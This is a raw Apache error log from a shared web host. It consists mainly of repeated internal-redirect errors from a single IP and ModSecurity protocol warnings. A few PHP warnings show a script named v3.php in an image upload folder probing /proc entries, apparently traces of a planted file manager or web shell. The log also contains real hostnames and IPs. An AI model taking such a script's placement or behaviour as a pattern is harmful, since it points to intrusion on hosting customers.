[Tue May 12 02:23:32.132842 2026] [core:error] [pid 1691274:tid 1691289] [client 20.226.81.141:47583] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:33.140466 2026] [core:error] [pid 1730175:tid 1730201] [client 20.226.81.141:35914] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:33.140690 2026] [core:error] [pid 1730175:tid 1730201] [client 20.226.81.141:35914] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:36.015345 2026] [core:error] [pid 1730175:tid 1730187] [client 20.226.81.141:36123] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:36.015382 2026] [core:error] [pid 1730175:tid 1730187] [client 20.226.81.141:36123] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:37.413414 2026] [core:error] [pid 1695975:tid 1696000] [client 20.226.81.141:36119] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:37.413451 2026] [core:error] [pid 1695975:tid 1696000] [client 20.226.81.141:36119] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:40.609158 2026] [core:error] [pid 1695975:tid 1695981] [client 20.226.81.141:36102] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:40.609427 2026] [core:error] [pid 1695975:tid 1695981] [client 20.226.81.141:36102] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:41.428990 2026] [core:error] [pid 1730175:tid 1730178] [client 20.226.81.141:47596] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:41.429020 2026] [core:error] [pid 1730175:tid 1730178] [client 20.226.81.141:47596] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1773816/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1773816/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1773816/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1773816/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1773816/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1773816/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 02:23:42.581363 2026] [core:error] [pid 1709071:tid 1709105] [client 20.226.81.141:47572] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:42.581396 2026] [core:error] [pid 1709071:tid 1709105] [client 20.226.81.141:47572] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:44.268442 2026] [core:error] [pid 1730207:tid 1730220] [client 20.226.81.141:36140] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:44.268480 2026] [core:error] [pid 1730207:tid 1730220] [client 20.226.81.141:36140] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:45.430249 2026] [core:error] [pid 1709071:tid 1709087] [client 20.226.81.141:36115] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:45.430279 2026] [core:error] [pid 1709071:tid 1709087] [client 20.226.81.141:36115] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:46.845362 2026] [core:error] [pid 1691274:tid 1691490] [client 20.226.81.141:36151] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:46.845398 2026] [core:error] [pid 1691274:tid 1691490] [client 20.226.81.141:36151] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:47.804288 2026] [core:error] [pid 1695975:tid 1695984] [client 20.226.81.141:35906] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:47.804337 2026] [core:error] [pid 1695975:tid 1695984] [client 20.226.81.141:35906] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:48.514268 2026] [core:error] [pid 1707624:tid 1707698] [client 20.226.81.141:36133] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:48.514311 2026] [core:error] [pid 1707624:tid 1707698] [client 20.226.81.141:36133] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:49.791198 2026] [core:error] [pid 1695975:tid 1696002] [client 20.226.81.141:36126] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:49.791224 2026] [core:error] [pid 1695975:tid 1696002] [client 20.226.81.141:36126] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:50.737635 2026] [core:error] [pid 1730175:tid 1730189] [client 20.226.81.141:36146] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:50.737668 2026] [core:error] [pid 1730175:tid 1730189] [client 20.226.81.141:36146] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:51.527294 2026] [core:error] [pid 1695975:tid 1695983] [client 20.226.81.141:35934] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:51.527341 2026] [core:error] [pid 1695975:tid 1695983] [client 20.226.81.141:35934] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:54.954864 2026] [core:error] [pid 1695975:tid 1695994] [client 20.226.81.141:36110] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:54.954901 2026] [core:error] [pid 1695975:tid 1695994] [client 20.226.81.141:36110] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:56.021998 2026] [core:error] [pid 1707624:tid 1707684] [client 20.226.81.141:47614] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:56.022034 2026] [core:error] [pid 1707624:tid 1707684] [client 20.226.81.141:47614] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:57.294584 2026] [core:error] [pid 1730175:tid 1730199] [client 20.226.81.141:42119] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:57.294763 2026] [core:error] [pid 1730175:tid 1730199] [client 20.226.81.141:42119] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:58.128634 2026] [core:error] [pid 1695975:tid 1695989] [client 20.226.81.141:42115] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:58.128672 2026] [core:error] [pid 1695975:tid 1695989] [client 20.226.81.141:42115] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:58.655039 2026] [core:error] [pid 1707624:tid 1707689] [client 20.226.81.141:36137] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:58.655074 2026] [core:error] [pid 1707624:tid 1707689] [client 20.226.81.141:36137] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:59.018984 2026] [security2:error] [pid 1730175:tid 1730185] [client 49.51.72.236:60120] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/"] [unique_id "agJzH3o6NvB9WXx5V-507QAAAQg"]
[Tue May 12 02:24:00.008115 2026] [core:error] [pid 1730207:tid 1730216] [client 20.226.81.141:36132] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:24:00.008154 2026] [core:error] [pid 1730207:tid 1730216] [client 20.226.81.141:36132] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:24:00.804229 2026] [core:error] [pid 1707624:tid 1707691] [client 20.226.81.141:47552] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:24:00.804265 2026] [core:error] [pid 1707624:tid 1707691] [client 20.226.81.141:47552] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:24:01.826933 2026] [core:error] [pid 1691274:tid 1691284] [client 20.226.81.141:35951] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:24:01.826967 2026] [core:error] [pid 1691274:tid 1691284] [client 20.226.81.141:35951] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:24:02.965587 2026] [security2:error] [pid 1730207:tid 1730229] [client 170.106.192.208:34752] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.manhattan-studio.fr"] [uri "/"] [unique_id "agJzIjue9Sp-pIv_Bb6K0AAAAVQ"], referer: http://www.manhattan-studio.fr
[Tue May 12 02:24:03.356521 2026] [core:error] [pid 1707624:tid 1707696] [client 20.226.81.141:42134] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:24:03.356557 2026] [core:error] [pid 1707624:tid 1707696] [client 20.226.81.141:42134] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:24:09.233444 2026] [core:error] [pid 1709071:tid 1709104] [client 20.226.81.141:36101] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:24:09.233494 2026] [core:error] [pid 1709071:tid 1709104] [client 20.226.81.141:36101] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:24:11.672597 2026] [core:error] [pid 1709071:tid 1709102] [client 20.226.81.141:35921] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:24:11.672635 2026] [core:error] [pid 1709071:tid 1709102] [client 20.226.81.141:35921] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:24:12.594200 2026] [core:error] [pid 1707624:tid 1707683] [client 20.226.81.141:36149] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:24:12.594224 2026] [core:error] [pid 1707624:tid 1707683] [client 20.226.81.141:36149] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:24:15.785433 2026] [security2:error] [pid 1695975:tid 1696002] [client 43.133.42.227:37272] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.habilis.space"] [uri "/"] [unique_id "agJzL9VI9ymHBxup74-HvQAAAJg"]
[Tue May 12 02:24:15.888885 2026] [core:error] [pid 1709071:tid 1709111] [client 20.226.81.141:47558] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:24:15.888915 2026] [core:error] [pid 1709071:tid 1709111] [client 20.226.81.141:47558] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:24:17.108947 2026] [core:error] [pid 1707624:tid 1707687] [client 20.226.81.141:36135] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:24:17.109000 2026] [core:error] [pid 1707624:tid 1707687] [client 20.226.81.141:36135] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:24:17.695648 2026] [security2:error] [pid 1691274:tid 1691298] [client 43.128.89.111:35502] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.classist.fr"] [uri "/"] [unique_id "agJzMVfdQaraX_prmqcaGgAAABc"]
[Tue May 12 02:24:18.651797 2026] [security2:error] [pid 1730175:tid 1730200] [client 43.133.42.227:41078] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.habilis.space"] [uri "/cgi-sys/suspendedpage.cgi"] [unique_id "agJzMno6NvB9WXx5V-51BQAAARc"], referer: http://www.habilis.space
[Tue May 12 02:24:19.956189 2026] [core:error] [pid 1695975:tid 1695983] [client 20.226.81.141:35907] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:24:19.956223 2026] [core:error] [pid 1695975:tid 1695983] [client 20.226.81.141:35907] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:24:21.784762 2026] [core:error] [pid 1691274:tid 1691280] [client 20.226.81.141:36153] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:24:21.784790 2026] [core:error] [pid 1691274:tid 1691280] [client 20.226.81.141:36153] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:24:24.382726 2026] [core:error] [pid 1730175:tid 1730179] [client 20.226.81.141:47563] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:24:24.382758 2026] [core:error] [pid 1730175:tid 1730179] [client 20.226.81.141:47563] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:24:26.229166 2026] [core:error] [pid 1707624:tid 1707689] [client 20.226.81.141:47578] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:24:26.229194 2026] [core:error] [pid 1707624:tid 1707689] [client 20.226.81.141:47578] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:24:28.980639 2026] [core:error] [pid 1707624:tid 1707690] [client 20.226.81.141:47605] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:24:28.980667 2026] [core:error] [pid 1707624:tid 1707690] [client 20.226.81.141:47605] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:24:31.141016 2026] [core:error] [pid 1730175:tid 1730185] [client 20.226.81.141:36108] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:24:31.141051 2026] [core:error] [pid 1730175:tid 1730185] [client 20.226.81.141:36108] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:24:34.307321 2026] [core:error] [pid 1730175:tid 1730182] [client 20.226.81.141:42146] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:24:34.307355 2026] [core:error] [pid 1730175:tid 1730182] [client 20.226.81.141:42146] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:24:36.868936 2026] [core:error] [pid 1707624:tid 1707696] [client 20.226.81.141:36129] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:24:36.868977 2026] [core:error] [pid 1707624:tid 1707696] [client 20.226.81.141:36129] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:24:38.810102 2026] [core:error] [pid 1695975:tid 1695987] [client 20.226.81.141:36152] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:24:38.810136 2026] [core:error] [pid 1695975:tid 1695987] [client 20.226.81.141:36152] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:24:39.827705 2026] [core:error] [pid 1691274:tid 1691281] [client 20.226.81.141:47565] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:24:39.827742 2026] [core:error] [pid 1691274:tid 1691281] [client 20.226.81.141:47565] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:24:40.733952 2026] [core:error] [pid 1730207:tid 1730230] [client 20.226.81.141:47566] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:24:40.733987 2026] [core:error] [pid 1730207:tid 1730230] [client 20.226.81.141:47566] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:24:41.259209 2026] [core:error] [pid 1695975:tid 1696000] [client 20.226.81.141:47574] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:24:41.259240 2026] [core:error] [pid 1695975:tid 1696000] [client 20.226.81.141:47574] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:24:42.212224 2026] [core:error] [pid 1691274:tid 1691292] [client 20.226.81.141:35938] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:24:42.212246 2026] [core:error] [pid 1691274:tid 1691292] [client 20.226.81.141:35938] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:24:43.124400 2026] [core:error] [pid 1730207:tid 1730218] [client 20.226.81.141:47568] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:24:43.124442 2026] [core:error] [pid 1730207:tid 1730218] [client 20.226.81.141:47568] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:24:43.751378 2026] [core:error] [pid 1695975:tid 1695982] [client 20.226.81.141:35961] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:24:43.751405 2026] [core:error] [pid 1695975:tid 1695982] [client 20.226.81.141:35961] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:24:46.156266 2026] [core:error] [pid 1730207:tid 1730228] [client 20.226.81.141:47569] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:24:46.156293 2026] [core:error] [pid 1730207:tid 1730228] [client 20.226.81.141:47569] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:24:46.937165 2026] [core:error] [pid 1695975:tid 1696002] [client 20.226.81.141:35954] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:24:46.937191 2026] [core:error] [pid 1695975:tid 1696002] [client 20.226.81.141:35954] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:24:48.358219 2026] [core:error] [pid 1707624:tid 1707694] [client 20.226.81.141:47609] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:24:48.358256 2026] [core:error] [pid 1707624:tid 1707694] [client 20.226.81.141:47609] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
